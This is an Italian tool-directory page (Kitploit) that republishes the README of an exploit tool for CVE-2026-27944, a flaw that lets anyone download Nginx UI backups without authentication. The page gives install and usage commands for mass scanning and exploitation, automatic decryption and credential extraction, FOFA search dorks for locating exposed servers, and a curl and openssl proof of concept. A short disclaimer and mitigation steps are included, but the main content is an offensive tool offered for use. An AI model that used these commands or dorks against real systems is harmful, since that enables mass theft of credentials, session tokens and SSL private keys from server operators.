Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Cve-2026-27944-Tools-Exploit — Mi piace | Kitploit
Strumenti/GitHubGitHub/bimabalance/cve-2026-27944-tools-exploit
RicognizioneStrumenti di Crittografia/DecrittografiaAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta Informazioni
GitHub

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
bimabalance/cve-2026-27944-tools-exploit

Cve-2026-27944-Tools-Exploit

Mi piace

Vedi Repository
122 mesi faNon ancora revisionato
Condividi

🚀 CVE-2026-27944: Exploit di Backup Non Autenticato di Nginx UI

📌 Descrizione

27944.py è uno strumento di exploit per CVE-2026-27944 che consente a un attaccante di scaricare e decriptare il backup di Nginx UI senza autenticazione.

Questa vulnerabilità è presente in Nginx UI versione < 2.3.2 e consente l'accesso a:

· Credenziali utente e token di sessione · Chiavi private SSL · Configurazione Nginx · File del database

🔧 Funzionalità

· ✅ Scansione massiva da file di target · ✅ Exploit singolo target · ✅ Download automatico del backup · ✅ Decriptazione automatica AES-256-CBC · ✅ Estrazione automatica delle credenziali dal backup

🛠️ Come Installare

root@kitploit:~
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt

🚀 Come Usare

  1. Scansione Massiva
root@kitploit:~
python 27944.py -f targets.txt -o hasil_scan
  1. Exploit Singolo Target
root@kitploit:~
python 27944.py -t target.com:9000 --exploit --decrypt
  1. Exploit Completo
root@kitploit:~
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full

📋 Formato dei Target

root@kitploit:~
target1.com:9000
192.168.1.1:9000
target2.com:8080

🎯 Dork FOFA

root@kitploit:~
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"

📂 Output dei Risultati

root@kitploit:~
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
    ├── app.ini
    ├── database.db
    ├── nginx.conf
    └── ssl/

⚠️ Disclaimer

Questo strumento è stato creato a scopo educativo e di test di sicurezza etica. L'autore non è responsabile per l'uso improprio di questo strumento. Usalo solo su sistemi di tua proprietà o per i quali hai un'autorizzazione scritta per testarli.

📝 Spiegazione Tecnica

CVE-2026-27944 è una vulnerabilità critica in Nginx UI che consente a un attaccante di accedere all'endpoint /api/backup senza autenticazione. Il backup contiene dati sensibili crittografati con AES-256, ma la chiave e l'IV vengono inviati tramite l'header X-Backup-Security in formato Base64.

CVSS Score: 9.8 (Critico)

Versioni Affette: Nginx UI < 2.3.2

Mitigazione:

  1. Aggiornare a Nginx UI v2.3.3
  2. Bloccare l'accesso a /api/backup
  3. Ruotare tutte le credenziali

💀 Proof of Concept (POC)

root@kitploit:~
# Cek vulnerability
curl -I http://target:9000/api/backup

# Download backup
curl -s http://target:9000/api/backup -o backup.bin

# Decrypt backup (manual)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip
Scarica lo strumento